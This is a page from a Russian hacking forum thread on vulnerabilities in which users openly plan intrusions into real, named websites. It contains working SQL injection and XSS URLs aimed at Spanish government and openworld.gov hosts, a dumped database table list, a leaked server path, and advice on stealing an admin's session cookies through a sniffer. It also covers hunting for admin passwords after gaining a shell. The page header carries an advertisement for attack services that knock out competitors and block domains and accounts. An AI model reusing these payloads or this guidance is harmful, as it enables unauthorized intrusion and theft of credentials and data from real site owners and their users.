Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 669 из 2438

669

Опции темы

Поиск в этой теме

Опции просмотра

#6681

13.04.2009, 10:45

Kraneg

Участник форума

Регистрация: 30.08.2008

Сообщений: 132

С нами: 9314306

Репутация: 325

FarIZ, Вот тут если у вас Firefox
Перед использованием проверьте что уязвимость доступна через POST, не всегда это бывает...

Последний раз редактировалось Kraneg; 13.04.2009 в 10:50..

#6682

13.04.2009, 13:55

теща

Постоянный

Регистрация: 14.09.2005

Сообщений: 415

С нами: 10871526

Репутация: 131

Отправить сообщение для теща с помощью MSN

Отправить сообщение для теща с помощью Yahoo

есть сайт
http://www.juntadeandalucia.es
я росканил хспайдером мне дало интиресну весч

Данная версия вебсервера Apache содержит chunked encoding уязвимость, что, помимо выведения сервера из строя, позволяет атакующему выполнить произвольный код, если сервер работает под управлением ОС FreeBSD, OpenBSD или NetBSD.
и
2 Возможно выполнение атаки межсайтовый скриптинг. Межсайтовый скриптинг (Cross site scripting или XSS) это возможность вставки HTML кода в уязвимую страницу. Инъекция кода осуществляется через все доступные способы ввода информации. Успешное завершение атаки может привести к использованию значений различных переменных, доступных в контексте сайта, записи информации, перехвату пользовательских сессий и т.д.

http://222.zone-217.12.16.juntadeandalucia.es:8081/webct/ticket/ticketLogin?action=print_login&request_uri=%22%3E% 3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%2 9%3C%2Fscript%3E%3C%22

как можна использовать ету уязвимость еть у кого ссылки на ету инфу буду благодарен ...
я пытался вдудлить туда XSS но ничего не дало

желательно примеры ли ресурсы такие по теме а не посылать в гугл я там был и там нех нету ...
хацкеры жду помощи )

Последний раз редактировалось теща; 13.04.2009 в 15:59..

#6683

13.04.2009, 17:28

VITАL

Познающий

Регистрация: 19.08.2008

Сообщений: 33

С нами: 9330638

Репутация: 93

теща
sql иньеция
http://www.juntadeandalucia.es/servicioandaluzdesalud/hpm/neumologia/noticias.php?id=-2295+or+1=1--
http://www.juntadeandalucia.es/averroes/~cepja4/html/menu.3.php?codigo=092321GT54'

а так же раскрытие путей
/mnt/centr2/41/41000612/includes/database.php

нащет хсс.. подкидывай сыслку админку и его куки летят тебе на снифер

Последний раз редактировалось VITАL; 13.04.2009 в 17:34..

#6684

13.04.2009, 18:46

massovka

Познающий

Регистрация: 05.04.2009

Сообщений: 71

С нами: 9000055

Репутация: 5

Ребята такой вопрос! Где могут сохранятся пароли от админки cayt/admin ! В phpadmin ничего не нашел доступ из шел только в папки сайта! Где они могу прятятся пароли?

#6685

13.04.2009, 20:03

Shaitan-Devil

Участник форума

Регистрация: 15.08.2008

Сообщений: 167

С нами: 9336002

Репутация: 204

Цитата:

Сообщение от massovka

Шелл есть? Есть доступ к скриптам? Посмотри, в одном из них могут храниться данные для доступа к БД. например cayt/admin/index.php

#6686

13.04.2009, 20:13

massovka

Познающий

Регистрация: 05.04.2009

Сообщений: 71

С нами: 9000055

Репутация: 5

Цитата:

Сообщение от Shaitan-Devil

да есть! Я вотчитал его не не могу разобратся! просто я начинающий может дам посмотришь его?

есть login.php и index.php

Последний раз редактировалось massovka; 13.04.2009 в 20:23..

#6687

13.04.2009, 20:28

+++AndreyDevil+++

Участник форума

Регистрация: 28.12.2008

Сообщений: 136

С нами: 9140897

Репутация: 90

http://www.openworld.gov/news/gallery.php?id=-1'+union+select+version()/*

Цитата:

Сообщение от blablabla

17 alumni
18 alumni_backup
19 alumni_link
20 alumni_old
21 archive
22 archive_file
23 archive_language
24 article
25 article_file
26 article_language
27 calendar
28 calendar_file
29 calendar_language
30 category
31 category_language
32 change_log
33 change_page
34 city
35 city_file
36 city_language
37 comment
38 comment_file
39 comment_language
40 contact
41 contact_access
42 contact_contactgroup
43 contact_language
44 contactgroup
45 contactgroup_language
46 country
47 country_language
48 delegation_file
49 enter_ip
50 faq
51 faq_file
52 faq_language
53 file
54 file_language
55 grantee
56 grantee_city
57 grantee_language
58 group
59 group_file
60 language
61 news
62 news_file
63 news_language
64 organization
65 organization_language
66 ow_theme
67 ow_theme_name
68 partnerbanner
69 phpbb_attach_quota
70 phpbb_attachments
71 phpbb_attachments_config
72 phpbb_attachments_desc
73 phpbb_auth_access
74 phpbb_banlist
75 phpbb_categories
76 phpbb_config
77 phpbb_confirm
78 phpbb_disallow
79 phpbb_extension_groups
80 phpbb_extensions
81 phpbb_forbidden_extensions
82 phpbb_forum_prune
83 phpbb_forums
84 phpbb_groups
85 phpbb_posts
86 phpbb_posts_deleted
87 phpbb_posts_text
88 phpbb_posts_text_deleted
89 phpbb_privmsgs
90 phpbb_privmsgs_text
91 phpbb_quota_limits
92 phpbb_ranks
93 phpbb_search_results
94 phpbb_search_wordlist
95 phpbb_search_wordmatch
96 phpbb_sessions
97 phpbb_sessions_keys
98 phpbb_smilies
99 phpbb_themes
100 phpbb_themes_name
101 phpbb_topics
102 phpbb_topics_watch
103 phpbb_user_group
104 phpbb_users
105 phpbb_users_deleted
106 phpbb_vote_desc
107 phpbb_vote_results
108 phpbb_vote_voters
109 phpbb_words
110 position_code
111 position_code_language
112 position_group
113 position_group_language
114 press
115 press_file
116 press_language
117 pub_gallery
118 pub_gallery_delegation
119 pub_gallery_file
120 pub_language
121 publisher
122 publisher_logo
123 publisher_name
124 section
125 section_backup
126 section_file
127 section_language
128 state
129 state_language
130 subscribers
131 supporter
132 supporter_language
133 sys_group
134 sys_language
135 sys_user
136 sys_user_group
137 snauthys_user_name
138 sys_user_u
139 translation

http://www.openworld.gov/phpMyAdmin/
phpMyAdmin есть но нет таблицы с юзерами.......как я понял я нервно курю в сторонке, т.к мне прав не хватает прочитать таблицы phpMyAdmin'а?

Последний раз редактировалось +++AndreyDevil+++; 13.04.2009 в 20:34..

#6688

13.04.2009, 20:39

DrAssault

Участник форума

Регистрация: 14.11.2008

Сообщений: 149

С нами: 9204308

Репутация: 256

104 phpbb_users - таблица с юзверями...
Андрей будь внимательней...

#6689

13.04.2009, 20:44

+++AndreyDevil+++

Участник форума

Регистрация: 28.12.2008

Сообщений: 136

С нами: 9140897

Репутация: 90

Может я слепой, но почему то форума там не наблюдаю (!)...

#6690

13.04.2009, 21:00

DrAssault

Участник форума

Регистрация: 14.11.2008

Сообщений: 149

С нами: 9204308

Репутация: 256

Цитата:

Сообщение от +++AndreyDevil+++

Может я слепой, но почему то форума там не наблюдаю (!)...

В таком случае встречный вопрос, таблицу с юзерами от чего ты ищешь, реги так сказать я там тоже не наблюдаю... хотя если только на поддомене: dd.openworld.gov жаль акка нет, регаться влом... насчет форума точно сказать не могу... скорее всего был когда то а таблицы не снесли...

Последний раз редактировалось DrAssault; 13.04.2009 в 22:10..

Страница 669 из 2438

669

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 19 (пользователей: 0 , гостей: 19)

Быстрый переход